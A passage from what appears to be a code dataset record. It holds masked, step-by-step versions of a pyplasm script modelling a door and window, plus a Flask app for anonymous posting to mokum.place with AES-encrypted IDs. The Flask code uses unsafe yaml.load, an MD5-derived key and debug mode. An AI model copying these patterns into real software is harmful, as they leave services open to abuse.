S1])(res)\n res = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(res)[0],\n dz / SIZE([3])(res)[0]])(res)\n door = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(STRUCT([res]))\n glass = CUBOID([SIZE([1])(res)[0] * 0.94, 0.01, SIZE([3])(res)[0] *\n 0.94])\n glass = T([1, 2, 3])([dx * 0.003, dy / 2, dz * 0.005])(glass)\n glass = TEXTURE(['glass.jpg'])(glass)\n refiner = CUBOID([0.03, 0.01, dz])\n refiner = T([1, 2])([dx / 2, dy])(refiner)\n refiner = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(refiner)\n handler1 = T(3)(0.15)(CUBOID([0.05, 0.02, 0.2]))\n handler2 = CUBOID([0.05, 0.02, 0.05])\n handler3 = T([1, 2])([0.01, 0.02])(CUBOID([0.03, 0.02, 0.2]))\n handler = TEXTURE('bronze.jpg')(STRUCT([handler3, handler2, handler1]))\n handler = T([1, 2, 3])([dx / 2.0 - 2 * SIZE([1])(handler)[0], dy, \n dz / 2.0 - 1.5 * SIZE([3])(handler)[0]])(handler)\n finalDoor = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(\n res)[0], dz / SIZE([3])(res)[0]])(STRUCT([door, glass, refiner,\n handler]))\n return finalDoor\n return door0\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef resizeXY(X, Y, occurrency, dx, dz):\n \"\"\"This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values\n\tcontained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed\"\"\"\n sumY = sum(Y)\n sumX = sum(X)\n visitedY = [False] * len(Y)\n for y_index in range(len(Y)):\n update = True\n for x_index in range(len(X)):\n if occurrency[x_index][y_index] == False:\n update = False\n if update:\n sumY = sumY - Y[y_index]\n sumX = sumX - X[y_index]\n dx = dx - X[y_index]\n dz = dz - Y[y_index]\n for x_index in range(len(X)):\n modifyX = False\n for y_index in range(len(Y)):\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == False:\n Y[y_index] = dz * Y[y_index] / sumY\n visitedY[y_index] = True\n modifyX = True\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == True and not modifyX:\n modifyX = True\n if modifyX:\n X[x_index] = dx * X[x_index] / sumX\n\n\ndef window(windowX, windowY, occurrency):\n \"\"\"This function, given three array, X, Y and occurrency, return the HPC model of the window\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for 'scaling'\"\"\"\n\n def window0(dx, dy, dz):\n resizeXY(windowX, windowY, occurrency, dx, dz)\n model = []\n for xIndex in range(len(windowX)):\n yQuotes = []\n xSum = sum(windowX[:xIndex])\n for yIndex in range(len(windowY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-windowY[yIndex])\n else:\n yQuotes.append(windowY[yIndex])\n model.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(\n yQuotes)]))\n result = STRUCT(model)\n result = MAP([S2, S3, S1])(PROD([result, Q(dy)]))\n windowFrame = STRUCT([result])\n windowFrame = TEXTURE(['iron.jpg'])(windowFrame)\n glass = CUBOID([SIZE([1])(result)[0] * 0.98, 0.001, SIZE([3])(\n result)[0] * 0.95])\n glass = T([1, 2, 3])([dx * 0.005, dy / 2, 0.01])(glass)\n glass = TEXTURE(['glass2.jpg'])(glass)\n window = STRUCT([windowFrame, glass])\n window = S([1, 2, 3])([dx / SIZE([1])(window)[0], dy / SIZE([2])(\n window)[0], dz / SIZE([3])(window)[0]])(window)\n return window\n return window0\n\n\ndef door(doorX, doorY, occurrency):\n \"\"\"This function takes in input three array, X, Y and occurrency and returns the HPC model of the door\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.\"\"\"\n\n def door0(dx, dy, dz):\n model = []\n for xIndex in range(len(doorX)):\n yQuotes = []\n xSum = sum(doorX[:xIndex])\n for yIndex in range(len(doorY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-doorY[yIndex])\n else:\n yQuotes.append(doorY[yIndex])\n model.append(PROD([QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)]))\n res = PROD([STRUCT(model), Q(dy)])\n res = MAP([S2, S3, S1])(res)\n res = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(res)[0],\n dz / SIZE([3])(res)[0]])(res)\n door = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(STRUCT([res]))\n glass = CUBOID([SIZE([1])(res)[0] * 0.94, 0.01, SIZE([3])(res)[0] *\n 0.94])\n glass = T([1, 2, 3])([dx * 0.003, dy / 2, dz * 0.005])(glass)\n glass = TEXTURE(['glass.jpg'])(glass)\n refiner = CUBOID([0.03, 0.01, dz])\n refiner = T([1, 2])([dx / 2, dy])(refiner)\n refiner = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(refiner)\n handler1 = T(3)(0.15)(CUBOID([0.05, 0.02, 0.2]))\n handler2 = CUBOID([0.05, 0.02, 0.05])\n handler3 = T([1, 2])([0.01, 0.02])(CUBOID([0.03, 0.02, 0.2]))\n handler = TEXTURE('bronze.jpg')(STRUCT([handler3, handler2, handler1]))\n handler = T([1, 2, 3])([dx / 2.0 - 2 * SIZE([1])(handler)[0], dy, \n dz / 2.0 - 1.5 * SIZE([3])(handler)[0]])(handler)\n finalDoor = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(\n res)[0], dz / SIZE([3])(res)[0]])(STRUCT([door, glass, refiner,\n handler]))\n return finalDoor\n return door0\n\n\nVIEW(door(doorX, doorY, doorOccurrency)(2.2, 0.4, 2.8))\nVIEW(window(windowX, windowY, windowOccurrency)(0.6, 0.1, 1.2))\n", "step-3": "<mask token>\ndoorY = [0.2, 0.18, 0.08, 0.18, 0.08, 0.18, 0.4, 0.18, 0.08, 0.18, 0.08, \n 0.18, 0.2]\ndoorX = [0.2, 0.5, 0.2, 1.8, 0.08, 0.18, 0.08, 0.18, 0.2]\ndoorOccurrency = [[True] * 13, [True, False, True, False, True, False, True,\n False, True, False, True, False, True], [True] * 13, [True, False, True,\n False, True, False, True, False, True, False, True, False, True], [True,\n False, True, False, True, True, True, True, True, False, True, False, \n True], [True, False, True, False, False, False, True, False, False, \n False, True, False, True], [True, False, True, True, True, True, True, \n True, True, True, True, False, True], [True, False, False, False, False,\n False, True, False, False, False, False, False, True], [True] * 13]\nwindowY = [0.04, 0.04, 0.2, 0.02, 0.16, 0.02, 0.2, 0.04, 0.04]\nwindowX = [0.02, 0.8, 0.05, 0.02, 0.4, 0.02, 0.4, 0.05, 0.04]\nwindowOccurrency = [[True] * 9, [True, False, False, False, False, False, \n False, False, True], [True] * 9, [True] * 9, [True, True, False, True, \n False, True, False, True, True], [True] * 9, [True, True, False, True, \n False, True, False, True, True], [True] * 9, [True] * 9]\n\n\ndef resizeXY(X, Y, occurrency, dx, dz):\n \"\"\"This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values\n\tcontained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed\"\"\"\n sumY = sum(Y)\n sumX = sum(X)\n visitedY = [False] * len(Y)\n for y_index in range(len(Y)):\n update = True\n for x_index in range(len(X)):\n if occurrency[x_index][y_index] == False:\n update = False\n if update:\n sumY = sumY - Y[y_index]\n sumX = sumX - X[y_index]\n dx = dx - X[y_index]\n dz = dz - Y[y_index]\n for x_index in range(len(X)):\n modifyX = False\n for y_index in range(len(Y)):\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == False:\n Y[y_index] = dz * Y[y_index] / sumY\n visitedY[y_index] = True\n modifyX = True\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == True and not modifyX:\n modifyX = True\n if modifyX:\n X[x_index] = dx * X[x_index] / sumX\n\n\ndef window(windowX, windowY, occurrency):\n \"\"\"This function, given three array, X, Y and occurrency, return the HPC model of the window\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for 'scaling'\"\"\"\n\n def window0(dx, dy, dz):\n resizeXY(windowX, windowY, occurrency, dx, dz)\n model = []\n for xIndex in range(len(windowX)):\n yQuotes = []\n xSum = sum(windowX[:xIndex])\n for yIndex in range(len(windowY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-windowY[yIndex])\n else:\n yQuotes.append(windowY[yIndex])\n model.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(\n yQuotes)]))\n result = STRUCT(model)\n result = MAP([S2, S3, S1])(PROD([result, Q(dy)]))\n windowFrame = STRUCT([result])\n windowFrame = TEXTURE(['iron.jpg'])(windowFrame)\n glass = CUBOID([SIZE([1])(result)[0] * 0.98, 0.001, SIZE([3])(\n result)[0] * 0.95])\n glass = T([1, 2, 3])([dx * 0.005, dy / 2, 0.01])(glass)\n glass = TEXTURE(['glass2.jpg'])(glass)\n window = STRUCT([windowFrame, glass])\n window = S([1, 2, 3])([dx / SIZE([1])(window)[0], dy / SIZE([2])(\n window)[0], dz / SIZE([3])(window)[0]])(window)\n return window\n return window0\n\n\ndef door(doorX, doorY, occurrency):\n \"\"\"This function takes in input three array, X, Y and occurrency and returns the HPC model of the door\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.\"\"\"\n\n def door0(dx, dy, dz):\n model = []\n for xIndex in range(len(doorX)):\n yQuotes = []\n xSum = sum(doorX[:xIndex])\n for yIndex in range(len(doorY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-doorY[yIndex])\n else:\n yQuotes.append(doorY[yIndex])\n model.append(PROD([QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)]))\n res = PROD([STRUCT(model), Q(dy)])\n res = MAP([S2, S3, S1])(res)\n res = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(res)[0],\n dz / SIZE([3])(res)[0]])(res)\n door = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(STRUCT([res]))\n glass = CUBOID([SIZE([1])(res)[0] * 0.94, 0.01, SIZE([3])(res)[0] *\n 0.94])\n glass = T([1, 2, 3])([dx * 0.003, dy / 2, dz * 0.005])(glass)\n glass = TEXTURE(['glass.jpg'])(glass)\n refiner = CUBOID([0.03, 0.01, dz])\n refiner = T([1, 2])([dx / 2, dy])(refiner)\n refiner = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(refiner)\n handler1 = T(3)(0.15)(CUBOID([0.05, 0.02, 0.2]))\n handler2 = CUBOID([0.05, 0.02, 0.05])\n handler3 = T([1, 2])([0.01, 0.02])(CUBOID([0.03, 0.02, 0.2]))\n handler = TEXTURE('bronze.jpg')(STRUCT([handler3, handler2, handler1]))\n handler = T([1, 2, 3])([dx / 2.0 - 2 * SIZE([1])(handler)[0], dy, \n dz / 2.0 - 1.5 * SIZE([3])(handler)[0]])(handler)\n finalDoor = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(\n res)[0], dz / SIZE([3])(res)[0]])(STRUCT([door, glass, refiner,\n handler]))\n return finalDoor\n return door0\n\n\nVIEW(door(doorX, doorY, doorOccurrency)(2.2, 0.4, 2.8))\nVIEW(window(windowX, windowY, windowOccurrency)(0.6, 0.1, 1.2))\n", "step-4": "from pyplasm import *\ndoorY = [0.2, 0.18, 0.08, 0.18, 0.08, 0.18, 0.4, 0.18, 0.08, 0.18, 0.08, \n 0.18, 0.2]\ndoorX = [0.2, 0.5, 0.2, 1.8, 0.08, 0.18, 0.08, 0.18, 0.2]\ndoorOccurrency = [[True] * 13, [True, False, True, False, True, False, True,\n False, True, False, True, False, True], [True] * 13, [True, False, True,\n False, True, False, True, False, True, False, True, False, True], [True,\n False, True, False, True, True, True, True, True, False, True, False, \n True], [True, False, True, False, False, False, True, False, False, \n False, True, False, True], [True, False, True, True, True, True, True, \n True, True, True, True, False, True], [True, False, False, False, False,\n False, True, False, False, False, False, False, True], [True] * 13]\nwindowY = [0.04, 0.04, 0.2, 0.02, 0.16, 0.02, 0.2, 0.04, 0.04]\nwindowX = [0.02, 0.8, 0.05, 0.02, 0.4, 0.02, 0.4, 0.05, 0.04]\nwindowOccurrency = [[True] * 9, [True, False, False, False, False, False, \n False, False, True], [True] * 9, [True] * 9, [True, True, False, True, \n False, True, False, True, True], [True] * 9, [True, True, False, True, \n False, True, False, True, True], [True] * 9, [True] * 9]\n\n\ndef resizeXY(X, Y, occurrency, dx, dz):\n \"\"\"This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values\n\tcontained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed\"\"\"\n sumY = sum(Y)\n sumX = sum(X)\n visitedY = [False] * len(Y)\n for y_index in range(len(Y)):\n update = True\n for x_index in range(len(X)):\n if occurrency[x_index][y_index] == False:\n update = False\n if update:\n sumY = sumY - Y[y_index]\n sumX = sumX - X[y_index]\n dx = dx - X[y_index]\n dz = dz - Y[y_index]\n for x_index in range(len(X)):\n modifyX = False\n for y_index in range(len(Y)):\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == False:\n Y[y_index] = dz * Y[y_index] / sumY\n visitedY[y_index] = True\n modifyX = True\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == True and not modifyX:\n modifyX = True\n if modifyX:\n X[x_index] = dx * X[x_index] / sumX\n\n\ndef window(windowX, windowY, occurrency):\n \"\"\"This function, given three array, X, Y and occurrency, return the HPC model of the window\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for 'scaling'\"\"\"\n\n def window0(dx, dy, dz):\n resizeXY(windowX, windowY, occurrency, dx, dz)\n model = []\n for xIndex in range(len(windowX)):\n yQuotes = []\n xSum = sum(windowX[:xIndex])\n for yIndex in range(len(windowY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-windowY[yIndex])\n else:\n yQuotes.append(windowY[yIndex])\n model.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(\n yQuotes)]))\n result = STRUCT(model)\n result = MAP([S2, S3, S1])(PROD([result, Q(dy)]))\n windowFrame = STRUCT([result])\n windowFrame = TEXTURE(['iron.jpg'])(windowFrame)\n glass = CUBOID([SIZE([1])(result)[0] * 0.98, 0.001, SIZE([3])(\n result)[0] * 0.95])\n glass = T([1, 2, 3])([dx * 0.005, dy / 2, 0.01])(glass)\n glass = TEXTURE(['glass2.jpg'])(glass)\n window = STRUCT([windowFrame, glass])\n window = S([1, 2, 3])([dx / SIZE([1])(window)[0], dy / SIZE([2])(\n window)[0], dz / SIZE([3])(window)[0]])(window)\n return window\n return window0\n\n\ndef door(doorX, doorY, occurrency):\n \"\"\"This function takes in input three array, X, Y and occurrency and returns the HPC model of the door\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.\"\"\"\n\n def door0(dx, dy, dz):\n model = []\n for xIndex in range(len(doorX)):\n yQuotes = []\n xSum = sum(doorX[:xIndex])\n for yIndex in range(len(doorY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-doorY[yIndex])\n else:\n yQuotes.append(doorY[yIndex])\n model.append(PROD([QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)]))\n res = PROD([STRUCT(model), Q(dy)])\n res = MAP([S2, S3, S1])(res)\n res = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(res)[0],\n dz / SIZE([3])(res)[0]])(res)\n door = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(STRUCT([res]))\n glass = CUBOID([SIZE([1])(res)[0] * 0.94, 0.01, SIZE([3])(res)[0] *\n 0.94])\n glass = T([1, 2, 3])([dx * 0.003, dy / 2, dz * 0.005])(glass)\n glass = TEXTURE(['glass.jpg'])(glass)\n refiner = CUBOID([0.03, 0.01, dz])\n refiner = T([1, 2])([dx / 2, dy])(refiner)\n refiner = TEXTURE(['wood.jpg', True, False, 1, 1, 0, 1, 1])(refiner)\n handler1 = T(3)(0.15)(CUBOID([0.05, 0.02, 0.2]))\n handler2 = CUBOID([0.05, 0.02, 0.05])\n handler3 = T([1, 2])([0.01, 0.02])(CUBOID([0.03, 0.02, 0.2]))\n handler = TEXTURE('bronze.jpg')(STRUCT([handler3, handler2, handler1]))\n handler = T([1, 2, 3])([dx / 2.0 - 2 * SIZE([1])(handler)[0], dy, \n dz / 2.0 - 1.5 * SIZE([3])(handler)[0]])(handler)\n finalDoor = S([1, 2, 3])([dx / SIZE([1])(res)[0], dy / SIZE([2])(\n res)[0], dz / SIZE([3])(res)[0]])(STRUCT([door, glass, refiner,\n handler]))\n return finalDoor\n return door0\n\n\nVIEW(door(doorX, doorY, doorOccurrency)(2.2, 0.4, 2.8))\nVIEW(window(windowX, windowY, windowOccurrency)(0.6, 0.1, 1.2))\n", "step-5": "from pyplasm import *\n\ndoorY = [.2,.18,.08,.18,.08,.18,.4,.18,.08,.18,.08,.18,.2]\ndoorX = [.2,.5,.2,1.8,.08,.18,.08,.18,.2]\n\ndoorOccurrency = [[True]*13,\n\t\t\t\t\t[True, False, True, False, True, False, True, False, True, False, True, False, True],\n\t\t\t\t\t[True]*13,\n\t\t\t\t\t[True, False, True, False, True, False, True, False, True, False, True, False, True],\n\t\t\t\t\t[True, False, True, False, True, True, True, True, True, False, True, False, True],\n\t\t\t\t\t[True, False, True, False, False, False, True, False, False, False, True, False, True],\n\t\t\t\t\t[True, False, True, True, True, True, True, True, True, True, True, False, True],\n\t\t\t\t\t[True, False, False, False, False, False, True, False, False, False, False, False, True],\n\t\t\t\t\t[True]*13]\n\nwindowY = [0.04,0.04,0.2,0.02,0.16,0.02,0.2,0.04,0.04]\nwindowX = [0.02,0.8,0.05,0.02,0.4,0.02,0.4,0.05,0.04]\n\nwindowOccurrency = [[True]*9,\n\t\t\t\t\t[True, False, False, False, False, False, False, False, True],\n\t\t\t\t\t[True]*9,\n\t\t\t\t\t[True]*9,\n\t\t\t\t\t[True, True, False, True, False, True, False, True, True],\n\t\t\t\t\t[True]*9,\n\t\t\t\t\t[True, True, False, True, False, True, False, True, True],\n\t\t\t\t\t[True]*9,\n\t\t\t\t\t[True]*9]\n\ndef resizeXY(X, Y, occurrency, dx, dz):\n\t\"\"\"This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values\n\tcontained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed\"\"\"\n\tsumY = sum(Y) \n\tsumX = sum(X)\n\tvisitedY = [False]*len(Y)\n\tfor y_index in range(len(Y)):\n\t\tupdate = True\n\t\tfor x_index in range(len(X)):\n\t\t\tif(occurrency[x_index][y_index] == False):\n\t\t\t\tupdate = False \n\t\tif(update):\n\t\t\tsumY = sumY - Y[y_index]\n\t\t\tsumX = sumX - X[y_index]\n\t\t\tdx = dx - X[y_index]\n\t\t\tdz = dz - Y[y_index]\n\n\tfor x_index in range(len(X)):\n\t\tmodifyX = False\n\t\tfor y_index in range(len(Y)):\n\t\t\tif(occurrency[x_index][y_index] == False and visitedY[y_index] == False):\n\t\t\t\tY[y_index] = (dz * Y[y_index])/sumY\n\t\t\t\tvisitedY[y_index] = True\n\t\t\t\tmodifyX = True\n\t\t\tif(occurrency[x_index][y_index] == False and visitedY[y_index] == True and not modifyX):\n\t\t\t\tmodifyX = True\n\t\tif(modifyX):\n\t\t\tX[x_index] = (dx * X[x_index])/sumX\n\n\ndef window(windowX, windowY, occurrency):\n\t\"\"\"This function, given three array, X, Y and occurrency, return the HPC model of the window\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for 'scaling'\"\"\"\n\tdef window0(dx, dy, dz):\n\n\t\tresizeXY(windowX,windowY,occurrency, dx, dz)\n\n\t\tmodel = []\n\t\tfor xIndex in range(len(windowX)):\n\t\t\tyQuotes = []\n\t\t\txSum = sum(windowX[:xIndex])\n\t\t\tfor yIndex in range(len(windowY)):\n\t\t\t\tif(occurrency[xIndex][yIndex] == False):\n\t\t\t\t\tyQuotes.append(-windowY[yIndex])\n\t\t\t\telse:\n\t\t\t\t\tyQuotes.append(windowY[yIndex])\n\t\t\tmodel.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(yQuotes)]))\n\n\t\tresult = STRUCT(model)\n\t\tresult = MAP([S2,S3,S1])(PROD([result, Q(dy)]))\n\t\twindowFrame = STRUCT([result])\n\t\twindowFrame = TEXTURE([\"iron.jpg\"])(windowFrame)\n\n\t\tglass = CUBOID([SIZE([1])(result)[0]*0.98,0.001,SIZE([3])(result)[0]*0.95])\n\t\tglass = T([1,2,3])([dx*0.005, dy/2, 0.01])(glass)\n\t\tglass = TEXTURE([\"glass2.jpg\"])(glass) \n\n\t\twindow = STRUCT([windowFrame, glass])\n\t\twindow = S([1,2,3])([dx/SIZE([1])(window)[0], dy/SIZE([2])(window)[0], dz/SIZE([3])(window)[0]])(window)\n\t\t\n\t\treturn window\n\n\treturn window0\n\n\ndef door(doorX, doorY, occurrency):\n\t\"\"\"This function takes in input three array, X, Y and occurrency and returns the HPC model of the door\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.\"\"\"\n\tdef door0(dx, dy, dz):\n\n\t\tmodel = []\n\n\t\tfor xIndex in range(len(doorX)):\n\t\t\tyQuotes = []\n\t\t\txSum = sum(doorX[:xIndex])\n\t\t\tfor yIndex in range(len(doorY)):\n\t\t\t\tif(occurrency[xIndex][yIndex] == False):\n\t\t\t\t\tyQuotes.append(-doorY[yIndex])\n\t\t\t\telse:\n\t\t\t\t\tyQuotes.append(doorY[yIndex])\n\t\t\tmodel.append(PROD([ QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)]))\n\n\t\tres = PROD([STRUCT(model), Q(dy)])\n\t\tres = MAP([S2,S3,S1])(res)\n\t\tres = S([1,2,3])([dx/SIZE([1])(res)[0], dy/SIZE([2])(res)[0], dz/SIZE([3])(res)[0]]) (res)\n\n\t\tdoor = TEXTURE([\"wood.jpg\", True, False, 1, 1, 0, 1, 1])(STRUCT([res]))\n\n\t\tglass = CUBOID([SIZE([1])(res)[0]*0.94, 0.01, SIZE([3])(res)[0]*0.94])\n\t\tglass = T([1,2,3])([dx*0.003, dy/2, dz*0.005])(glass)\n\t\tglass = TEXTURE([\"glass.jpg\"])(glass)\n\n\t\trefiner = CUBOID([0.03, 0.01,dz])\n\t\trefiner = T([1,2])([dx/2,dy])(refiner)\n\t\trefiner = TEXTURE([\"wood.jpg\", True, False, 1, 1, 0, 1, 1])(refiner)\n\n\t\thandler1 = T(3)(.15)(CUBOID([.05,.02,.2]))\n\t\thandler2 = CUBOID([.05,.02,.05])\n\t\thandler3 = T([1,2])([.01,.02])(CUBOID([.03,.02,.2]))\n\t\thandler = TEXTURE(\"bronze.jpg\")(STRUCT([handler3, handler2, handler1]))\n\t\thandler = T([1,2,3])([dx/2.-2*SIZE([1])(handler)[0],dy, dz/2.-1.5*SIZE([3])(handler)[0]])(handler)\n\n\t\tfinalDoor = S([1,2,3])([dx/SIZE([1])(res)[0], dy/SIZE([2])(res)[0], dz/SIZE([3])(res)[0]]) (STRUCT([door, glass, refiner, handler]))\n\n\t\treturn finalDoor\n\n\treturn door0\n\nVIEW(door(doorX, doorY, doorOccurrency)(2.2, .4, 2.8))\nVIEW(window(windowX,windowY,windowOccurrency)(.6,.1,1.2))", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
from flask import Flask from flask import request, redirect, render_template from flask_bootstrap import Bootstrap import urllib.request import urllib.parse import json import uuid import yaml import hashlib from Crypto import Random from Crypto.Cipher import AES import base64 app = Flask(__name__) Bootstrap(app) with open("app_config.yml", 'r') as ymlfile: cfg = yaml.load(ymlfile) postapikey = cfg['app']['postapikey'] mainurl = cfg['app']['mainurl'] appurl = cfg['app']['appurl'] secretkey = cfg['app']['secret'] # Some crypto staff BLOCK_SIZE = 16 def trans(key): return hashlib.md5(key.encode("utf-8")).digest() def encrypt(message, passphrase): passphrase = trans(passphrase) IV = Random.new().read(BLOCK_SIZE) aes = AES.new(passphrase, AES.MODE_CFB, IV) return base64.b32encode(IV + aes.encrypt(message)).decode("utf-8") def decrypt(encrypted, passphrase): passphrase = trans(passphrase) encrypted = base64.b32decode(encrypted) IV = encrypted[:BLOCK_SIZE] aes = AES.new(passphrase, AES.MODE_CFB, IV) return aes.decrypt(encrypted[BLOCK_SIZE:]).decode("utf-8") def mokum_message(message): try: postdata = {"post": {"timelines": ["user"], "text": message, "comments_disabled": True, "nsfw": False}, "_uuid": str(uuid.uuid4()) } req = urllib.request.Request("https://mokum.place/api/v1/posts.json") req.add_header('Content-Type', 'application/json') req.add_header('Accept', 'application/json') req.add_header('X-API-Token', postapikey) resp = urllib.request.urlopen(req, json.dumps(postdata).encode("utf-8")) message = json.loads(resp.read().decode("utf-8")) if message['post']['id']: return message['post']['id'] except: return False def mokum_comment(messageid, comment): try: posturl = "https://mokum.place/api/v1/posts/" + str(messageid) + "/comments.json" postdata = {"comment": {"text": comment, # "platform": "anonymous device" }, "_uuid": str(uuid.uuid4())} req = urllib.request.Request(posturl) req.add_header('Content-Type', 'application/json') req.add_header('Accept', 'application/json') req.add_header('X-API-Token', postapikey) resp = urllib.request.urlopen(req, json.dumps(postdata).encode("utf-8")) message = json.loads(resp.read().decode("utf-8")) if message['id']: return message['id'] except: return False @app.route('/') def main(): return render_template('post.html') @app.route('/post', methods=['POST']) def post(): posttext = request.form['post'] id = mokum_message(posttext) mokum_comment(id, "click to comment --> " + appurl + "/c/" + encrypt(str(id), secretkey)) return redirect(mainurl + str(id)) @app.route('/c/<cid>') def comm(cid): return render_template('comment.html', cid=cid) @app.route('/comment', methods=['POST']) def commented(): postid = decrypt(request.form['cid'], secretkey) posttext = request.form['comment'] mokum_comment(postid, posttext) return redirect(mainurl + postid) if __name__ == '__main__': app.run(debug=True)
normal
{ "blob_id": "e55115a65ebee5d41dcd01a5cbabc328acf152da", "index": 6079, "step-1": "<mask token>\n\n\ndef encrypt(message, passphrase):\n passphrase = trans(passphrase)\n IV = Random.new().read(BLOCK_SIZE)\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return base64.b32encode(IV + aes.encrypt(message)).decode('utf-8')\n\n\ndef decrypt(encrypted, passphrase):\n passphrase = trans(passphrase)\n encrypted = base64.b32decode(encrypted)\n IV = encrypted[:BLOCK_SIZE]\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return aes.decrypt(encrypted[BLOCK_SIZE:]).decode('utf-8')\n\n\ndef mokum_message(message):\n try:\n postdata = {'post': {'timelines': ['user'], 'text': message,\n 'comments_disabled': True, 'nsfw': False}, '_uuid': str(uuid.\n uuid4())}\n req = urllib.request.Request('https://mokum.place/api/v1/posts.json')\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, json.dumps(postdata).encode('utf-8')\n )\n message = json.loads(resp.read().decode('utf-8'))\n if message['post']['id']:\n return message['post']['id']\n except:\n return False\n\n\n<mask token>\n\n\[email protected]('/')\ndef main():\n return render_template('post.html')\n\n\[email protected]('/post', methods=['POST'])\ndef post():\n posttext = request.form['post']\n id = mokum_message(posttext)\n mokum_comment(id, 'click to comment --> ' + appurl + '/c/' + encrypt(\n str(id), secretkey))\n return redirect(mainurl + str(id))\n\n\[email protected]('/c/<cid>')\ndef comm(cid):\n return render_template('comment.html', cid=cid)\n\n\[email protected]('/comment', methods=['POST'])\ndef commented():\n postid = decrypt(request.form['cid'], secretkey)\n posttext = request.form['comment']\n mokum_comment(postid, posttext)\n return redirect(mainurl + postid)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef trans(key):\n return hashlib.md5(key.encode('utf-8')).digest()\n\n\ndef encrypt(message, passphrase):\n passphrase = trans(passphrase)\n IV = Random.new().read(BLOCK_SIZE)\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return base64.b32encode(IV + aes.encrypt(message)).decode('utf-8')\n\n\ndef decrypt(encrypted, passphrase):\n passphrase = trans(passphrase)\n encrypted = base64.b32decode(encrypted)\n IV = encrypted[:BLOCK_SIZE]\n aes = AES.new(passphrase, AES.MODE_CFB, IV)\n return aes.decrypt(encrypted[BLOCK_SIZE:]).decode('utf-8')\n\n\ndef mokum_message(message):\n try:\n postdata = {'post': {'timelines': ['user'], 'text': message,\n 'comments_disabled': True, 'nsfw': False}, '_uuid': str(uuid.\n uuid4())}\n req = urllib.request.Request('https://mokum.place/api/v1/posts.json')\n req.add_header('Content-Type', 'application/json')\n req.add_header('Accept', 'application/json')\n req.add_header('X-API-Token', postapikey)\n resp = urllib.request.urlopen(req, 